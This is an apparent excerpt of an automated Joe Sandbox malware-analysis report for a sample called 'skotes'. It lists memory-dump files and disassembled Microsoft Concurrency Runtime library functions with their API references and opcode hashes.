Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 40897a237ebdab456e6876667f42dc07705b8e79d18c5a920f758970cc68c915
Instruction ID: 59a0bde50747e60d805ae1e4800fbc4d7e1ef450eeb581c16e5960dc67326118
Opcode Fuzzy Hash: 40897a237ebdab456e6876667f42dc07705b8e79d18c5a920f758970cc68c915
Instruction Fuzzy Hash: B3B18E70A04615EFDB28CF58D990B7EB7B8FF85301F15416EE905AB291D730AD81CBA0

Function 00961602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00962CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00962D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00961614

Part of subcall function 00962E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00962E39
Part of subcall function 00962E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00962EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00961746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 009617A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 009617B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 009617ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0096180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0096181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00961823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0096183B

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: dff98976139045bdf9d6c763bac0089c290f94b3bb6e7dcad0f43cbb9ac24f96
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: EF816B75E006269FCB19CFA8C580A6DB7F6FF88304B1986ADD445AB701CB70AD52CB84

Function 0096EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0096EC81

Part of subcall function 00968F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00968F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0096ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0096ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0096ED0C

Part of subcall function 0096E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0096E7D7
Part of subcall function 0096E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0096E86F
Part of subcall function 0096E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0096E879
Part of subcall function 0096E7AF: Concurrency::location::_Assign.LIBCMT ref: 0096E8AD
Part of subcall function 0096E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0096E8B5

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: f9ac85978c324a87c7fdb429da6f91295ed97bfe0d558d4e4c0e263777190192
Instruction ID: baf2cdd49aeb702353e91acb447f3863f4e9e509d6d2b0ec4cc5699260950980
Opcode Fuzzy Hash: f9ac85978c324a87c7fdb429da6f91295ed97bfe0d558d4e4c0e263777190192
Instruction Fuzzy Hash: 4F518135A00215DFCF24DF54C8A9BADB775AF84310F1580A9E9067B3D2CB71AE05CBA1

Function 0095CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0095CBAA

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 0ce2c28703fce72148250594e7ee78f8d7938ca87e5e83933b2eada7f81bcf68
Instruction ID: 9444cdc30feb9dcfbdabeb3cbd0f88928f4b5d6dd55cd2508c9e3e8bf675a903
Opcode Fuzzy Hash: 0ce2c28703fce72148250594e7ee78f8d7938ca87e5e83933b2eada7f81bcf68
Instruction Fuzzy Hash: E9B09232B2B9304BCA516B18BC0859D77189E81A1230E4196DC11A72248A111D82ABD4

Function 0095DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
